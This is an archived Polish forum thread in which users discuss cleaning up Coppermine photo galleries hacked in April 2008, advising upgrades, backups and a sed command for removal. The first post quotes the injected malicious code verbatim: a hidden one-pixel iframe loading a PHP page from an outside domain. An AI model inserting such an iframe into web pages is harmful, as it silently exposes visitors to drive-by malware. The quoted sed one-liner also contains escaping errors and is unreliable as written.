PDA

Zobacz pełną wersję : Coppermine hacked



rene
25-04-2008, 12:57
Witam

18 kwietnia całkiem spora ilość galerii Coppermine została zhakowana. Objawia się to generalnie tym że zmienia atrybuty galerii co początkowo uniemożliwia wejście na nią (777 na 775), zmienia ustawienia i wygląd galerii, ale co gorsza - wpieprza w kod taką linijkę:

<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>

Podejrzewam że zabawa będzie polegać na usunięciu tego syfu ręcznie, większym problemem jest jednak namierzenie w których plikach konkretnie znajduje się ten kod. Rozpoznać to można dosyć łatwo - po otwarciu galerii w różnych miejscach, zazwyczaj w narożniku, znajduje się malutki kwadracik.

Miał ktoś już ten problem? Wie ktoś jak się tego pozbyć?

Misiaque
25-04-2008, 13:02
Myślę, że zabawa to będzie polegać na tym, by zamknąć furtkę którą się to stało ;)

Kolaj
25-04-2008, 13:06
Która miałeś wersję Coppermine? Całkiem niedawno ukazała się 1.4.18, która łata jakieś dziury.

rene
25-04-2008, 13:12
1.4.5

O tej nowej wiem, problem jest taki że nowa wersja łata dziury i zabezpiecza przed ponownym hakowaniem, ale stary syf trzeba usunąć samemu.

Wyczyściłem plik index.php, ale nie pomogło, zaszyte jest to też w innych plikach, i w tym szkopuł. Na razie próbuję zassać Allias Find and Replace, ale może ktoś mnie uprzedzi i wie jak sobie z tym dziadostwem poradzić?

Kolaj
25-04-2008, 13:20
O, kolego, to ja widzę, że Ty się sam o to prosiłeś. Od publikacji 1.4.5 upłynęły dwa lata, wykryto mnóstwo błędów i wypuszczono wiele aktualizacji. Aktualizować trzeba na bieżąco.

Natomiast, teraz, to zamiast bawić się w takie wyszukiwanie i usuwanie, po prostu zaktualizuj do bieżącej wersji. Aktualizacja polega na nadgraniu prawie wszystkich plików i wywołaniu update.php, który aktualizuje strukturę bazy danych. Powinno pomóc.

Aha, nie zapomnij wykonać wcześniej backup bazy i plików.

EDIT: Procedura aktualizacji z wersji 1.4.x:
http://coppermine-gallery.net/demo/cpg14x/docs/index.htm#14

rene
25-04-2008, 13:39
A jak to ma się do bieżących ustawień galerii? Czy po takim update muszę ponownie ustawiać wszystko wedle mojego "widzimisię", czy taka aktualizacja nie ingeruje w wygląd ani ustawienia użytkownika?

A z tymi 2 latami to fakt, bo mniej więcej od tego okresu mam tą galerie ;)

Kolaj
25-04-2008, 13:44
A jak to ma się do bieżących ustawień galerii? Czy po takim update muszę ponownie ustawiać wszystko wedle mojego "widzimisię", czy taka aktualizacja nie ingeruje w wygląd ani ustawienia użytkownika?
Jak zrobisz zgodnie z procedurą, to nic się nie uszkodzi i ustawienia zostaną zachowane. A jeśli nawet, to przecież masz backup, który zrobisz tuż przed aktualizacją.

A z tymi 2 latami to fakt, bo mniej więcej od tego okresu mam tą galerie ;)No, to masz nauczkę na przyszłość.

rene
25-04-2008, 13:52
Backup to właśnie robię, obawiam się że przy szybkości mojego łącza potrwa to kilka ładnych godzin, i to jest największy ból tego wszystkiego.

No nic, mam nadzieję że plewienie chwastów odbędzie się w miarę bezboleśnie.

Pochwalę się jak będzie po wszystkim.

A co do nauczki - większość aplikacji przyzwyczaiła mnie do tego wygodnego wyskakującego raz na jakiś czas okienka: czy chcesz zainstalować aktualizację? I ot - cała historia :)

Dzięki Kolaj!

Peri Noid
25-04-2008, 14:28
Jeśli masz tam dostęp shell-owy (jakiś Unix/Linux/BSD) to możesz wspomóc się sed'em. Jeśli dodany napis jest zawsze taki sam, to możesz na drzewku z plikami zapuścić coś takiego:

find -type f -exec sed -i "s/<iframe src='http:\/\/ccfelomvhk.com\/d\l/adv542.php' width=1 height=1><\/iframe>//g'" '{}' \;
To powinno wyciąć wszystkie powtórzenia tego tekstu. Oczywiście, lepiej najpierw zrobic sobie backup ;-)

Kolaj
25-04-2008, 14:45
Ale po co robić takie hece, skoro i tak następnym krokiem powinien być update do aktualnej wersji, który, jak wcześniej wspomniałem, nadgrywa wszystkie pliki oprócz konfiguracyjnych i folderu albums, w którym leżą wyłącznie nasze kochane jpg-i?

rene
27-04-2008, 14:51
No i tak:

ten syfek atakuje sprytnie i nieostrożnie - wszystko to co na widoku i to co używane.

Zrobiłem więc backup, zamieniłem wg opisu wszystko z wyjątkiem "albums", "config" i "anycontent".

Pierwszy zonk - mój layout poszedł w diabły. Pewno dlatego że używałem zmodyfikowanego "classic", a ten - jak wiadomo - został zamieniony na nową wersję. Jest to 100% logiczne, tak samo jak fakt że miałem prawo tego nie pamiętać - minęły w końcu 2 lata.

Wczytałem zatem stary zbackupowany "classic" w katalogu "themes", i oczywiście syfek znowu był. Na szczęście są tam tylko 2 pliki w których się zagnieżdża - "theme" i "template". Szybka edycja, wywalenie felernego kawałka kodu i śmiga.

Gdyby nie prędkość mojego łącza, powiedziałbym że nawet bezboleśnie!

Pozdrawiam

Kolaj
28-04-2008, 07:38
A zdobyte dzięki tej przygodzie doświadczenie - BEZCENNE! :)

I pamiętaj regularnie odwiedzać stronę Coppermine i nie zaniedbywać aktualizacji.

Kolaj
07-08-2008, 08:32
Pojawił się upgrade Coppermine do wersji 1.4.19. Oprócz drobnych poprawek, załatana jest także pewna luka w zabezpieczeniach, dlatego aktualizacja ma status mandatory.

http://forum.coppermine-gallery.net/index.php/topic,54235.0.html